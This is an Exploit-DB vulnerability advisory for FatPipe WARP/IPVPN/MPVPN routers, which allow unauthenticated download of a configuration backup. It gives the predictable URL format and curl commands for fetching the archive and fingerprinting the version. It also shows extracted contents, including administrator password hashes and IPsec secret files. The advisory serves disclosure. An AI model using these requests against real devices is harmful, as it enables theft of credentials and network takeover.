FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download

A vulnerability in FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 allows an unauthenticated attacker to download the configuration file of the device. This can be done by sending a specially crafted HTTP request to the device. The configuration file contains sensitive information such as usernames, passwords, and IP addresses.
Mitigation:

Upgrade to the latest version of FatPipe Networks WARP/IPVPN/MPVPN.
Source
Exploit-DB raw data:

# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download


Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
                  10.2.2r38
                  10.2.2r25
                  10.2.2r10
                  10.1.2r60p82
                  10.1.2r60p71
                  10.1.2r60p65
                  10.1.2r60p58s1
                  10.1.2r60p58
                  10.1.2r60p55
                  10.1.2r60p45
                  10.1.2r60p35
                  10.1.2r60p32
                  10.1.2r60p13
                  10.1.2r60p10
                  9.1.2r185
                  9.1.2r180p2
                  9.1.2r165
                  9.1.2r164p5
                  9.1.2r164p4
                  9.1.2r164
                  9.1.2r161p26
                  9.1.2r161p20
                  9.1.2r161p17
                  9.1.2r161p16
                  9.1.2r161p12
                  9.1.2r161p3
                  9.1.2r161p2
                  9.1.2r156
                  9.1.2r150
                  9.1.2r144
                  9.1.2r129
                  7.1.2r39
                  6.1.2r70p75-m
                  6.1.2r70p45-m
                  6.1.2r70p26
                  5.2.0r34

Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.

FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.

FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.

Desc: The application is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the backup archive file using an HTTP
GET request. The only unknown part of the filename is the hostname of the system.
This will enable the attacker to disclose sensitive information and help her
in authentication bypass, privilege escalation and full system access.

Tested on: Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5683
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php


30.05.2016
25.07.2021

--


Products:
---------
WARP / MPVPN / IPVPN

Format:
-------
https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz

Examples:
---------
curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP
curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN

Version:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2"
103:    <h5>10.2.2r38</h5>

Product:
--------
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe"
15:    <title>FatPipe MPVPN&nbsp;| Log in</title>

Content:
--------
$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz
$ cd etc
$ cat Xpasswd
Administrator:26df420bcb78bb02eef532d51aea22e2:1
fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1

$ ls
.
..
auto_config.conf
bird.conf
bridge.conf
cm.conf
crontab
dhcpd.conf
dnssec.conf
dynamic_route.conf
fatpipe
fileserver.conf
fp_arp.conf
fp_config.dtd
fp_distributed_global_rule
fp_global_rule
fp_version
haproxy
hosts
interface_access_list.conf
ipsec.conf
ipsec.d
ipsec.secrets
ipsec_cert_secrets
ipsec_shared_secrets
ipsec_subnet.conf
ipsec_xauth.conf
ipv4_dynamic_routing.conf
logrotate.d
manifest
named.conf
network_object.conf
ntp.conf
ppp
radiusclient
resolv.conf
rsyslog.conf
site.xml
site.xml.org
snmp_config.conf
squid
sysconfig
syslog.conf
tcp-congestion-table.conf
tcp-congestion-table.conf.org
webfilter.conf
xgreet.txt
xnetmap.conf
Xpasswd
xsnmp.conf
xtreme_conf.xml